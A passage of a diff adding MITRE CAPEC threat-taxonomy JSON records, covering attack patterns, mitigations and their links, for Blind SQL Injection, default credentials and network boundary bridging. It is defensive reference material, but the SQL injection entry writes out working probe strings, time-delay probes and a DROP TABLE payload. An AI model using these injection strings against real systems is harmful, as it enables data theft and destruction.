"2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99ccf3d5-4c15-4adb-9806-07bac3ee35cf", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Lock away the video cables, making it difficult for the attacker to access the cables and place the antenna near them (If the distance condition between the antenna and display port/cable is not satisfied, the attack will not be possible).", + "id": "course-of-action--e78b24cb-16be-4fd1-ab9c-ed10647686ef", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef557ac3-a5f5-494e-8b0f-57eca9a0d5f7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e78b24cb-16be-4fd1-ab9c-ed10647686ef", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--e9dfadfb-5d7f-42f4-863c-050ca2c032a3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f8d907a7-bede-4731-9dcd-7930220cf37b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9dfadfb-5d7f-42f4-863c-050ca2c032a3", + "target_ref": "attack-pattern--0a8ef002-1cb8-46e1-bc44-efd0a39b2a67", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", + "external_references": [ + { + "external_id": "CAPEC-7", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/7.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Blind SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_SQL_Injection" + } + ], + "id": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Blind SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary may try entering something like \"username' AND 1=1; --\" in an input field. If the result is the same as when the adversary entered \"username\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:\n \"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108\".\n If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:\n \"username'; DROP TABLE trades; --\n ", + "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. [Hypothesize SQL queries in application]Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:\n \"SELECT * FROM orders WHERE ordernum = _____\"or\"SELECT * FROM orders WHERE ordernum IN (_____)\"or\"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____\"\n Of course, there are many other possibilities.\n

    2. Techniques
    Research types of SQL queries and determine which ones could be used at various places in an application.

  2. [Determine how to inject information into the queries]Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:\n \"5' OR 1=1; --\"and\"5) OR 1=1; --\"and\"ordernum DESC; --\"\n

    3. Techniques
    Add clauses to the SQL queries such that the query logic does not change.
    Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Determine database type: Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries

    3. Techniques
    Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
    Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
    Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not).

Exploit

  1. Extract information about database schema: Extract information about database schema by getting the database to answer yes/no questions about the schema.

    2. Techniques
    Automatically extract database schema using a tool such as Absinthe.
    Manually perform the blind SQL Injection to extract desired information about the database schema.

  2. Exploit SQL Injection vulnerability: Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database

    3. Techniques
    Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", + "id": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-7-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e9617f-1737-408d-9e05-97402a6101c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", + "external_references": [ + { + "external_id": "CAPEC-70", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Valid Accounts:Default Accounts", + "external_id": "T1078.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078/001" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Risks of Default Passwords on the Internet, 2016--10---07, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-574", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA13-175A" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-596", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-597", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html" + } + ], + "id": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Try Common or Default Usernames and Passwords", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user sets their password to \"123\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.", + "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288", + "In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.The adversary has the means to interact with the system." + ], + "x_capec_resources_required": [ + "Technology or vendor specific list of default usernames and passwords." + ], + "x_capec_skills_required": { + "Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Delete all default account credentials that may be put in by the product vendor.", + "id": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-70-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ae690da-8edd-49c2-92c4-8f09f6f23cd6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac1c094b-9c14-4717-9353-911a46460f08", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3139771b-b483-4f77-b9ab-79ab1c9eafbe", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary which has gained elevated access to network boundary devices may use these devices to create a channel to bridge trusted and untrusted networks. Boundary devices do not necessarily have to be on the network’s edge, but rather must serve to segment portions of the target network the adversary wishes to cross into.", + "external_references": [ + { + "external_id": "CAPEC-700", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/700.html" + }, + { + "description": "Network Boundary Bridging", + "external_id": "T1599", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1599" + }, + { + "description": "CISA, Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, 2018--04---16", + "external_id": "REF-746", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + } + ], + "id": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Network Boundary Bridging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Alter Execution Logic", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Alter Execution Logic", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In November 2016, a Smart Install Exploitation Tool was released online which takes advantage of Cisco’s unauthenticated SMI management protocol to download a target’s current configuration files. Adversaries can use this tool to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Once the adversary has access to the device’s configurations, they could modify it to redirect network traffic through other network infrastructure.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: An adversary identifies network boundary devices that can be compromised.

    2. Techniques
    The adversary traces network traffic to identify which devices the traffic flows through. Additionally, the adversary can identify devices using fingerprinting methods or locating the management page to determine identifying information about the device.

Experiment

  1. Compromise targets: The adversary must compromise the identified targets in the previous step.

    2. Techniques
    Once the device is identified, the adversary can attempt to input known default credentials for the device to gain access to the management console.
    Adversaries with sufficient identifying knowledge about the target device can exploit known vulnerabilities in network devices to obtain administrative access.

Exploit

  1. Bridge Networks: The adversary changes the configuration of the compromised network device to connect the networks the device was segmenting. Depending on the type of network boundary device and its capabilities, bridging can be implemented using various methods.

    2. Techniques
    The adversary can abuse Network Address Translation (NAT) in firewalls and routers to manipulate traffic flow to their own design. With control of the network device, the adversary can manipulate NAT by either using existing configurations or creating their own to allow two previously unconnected networks to communicate.
    Some network devices can be configured to become a proxy server. Adversaries can set up or exploit an existing proxy server on compromised network devices to create a bridge between separate networks.
", + "x_capec_extended_description": "\n Network boundary devices are network devices such as routers and firewalls which segment networks by restricting certain types of traffic from flowing through the device. Network boundary devices are often directly accessible through a portal page for management purposes. An adversary’s goal when conducting network boundary bridging is to connect networks which are being segmented by the device. To do so, the adversary must first compromise the network boundary device.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have control of a network boundary device." + ], + "x_capec_resources_required": [ + "The adversary requires either high privileges or full control of a boundary device on a target network." + ], + "x_capec_skills_required": { + "Medium": "The adversary must understand how to manage the target network device to create or edit policies which will bridge networks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure network devices are storing credentials in encrypted stores", + "id": "course-of-action--48c7eeb6-15ae-4cec-83c9-43893ab87cc2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6685710a-ae92-409d-b90b-bf42d99ddf9e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--48c7eeb6-15ae-4cec-83c9-43893ab87cc2", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0499645-0b5a-4a77-a9aa-5a9898a56cda", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a94e0345-2aae-474c-96d1-4ee3ce4403b5", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: When possible, configure network boundary devices to use MFA.", + "id": "course-of-action--b8b5187b-5902-4526-9261-21ee49698185", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e16116d-adb8-4e42-9ede-f06f91cc6e40", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8b5187b-5902-4526-9261-21ee49698185", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18434696-8393-4a65-95db-162c9fcb9da9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform integrity checks on audit logs for network device management and review them to identify abnormalities in configurations.", + "id": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--089719e2-cc34-4f35-8302-12fd80decb91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prevent network boundary devices from being physically accessed by unauthorized personnel to prevent tampering.", + "id": "course-of-action--d9a1e293-f73e-4dd1-b0b2-391632fec089", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4272c85c-323b-48c9-a816-4a446c85026f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9a1e293-f73e-4dd1-b0b2-391632fec089", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the inherent functionalities of a web browser, in order to establish an unnoticed remote desktop connection in the victim's browser to the adversary's system. The adversary must deploy a web client with a remote desktop session that the victim can access.", + "external_references": [ + { + "external_id": "CAPEC-701", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/701.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Tommasi F., Catalano, C., Taurino I., 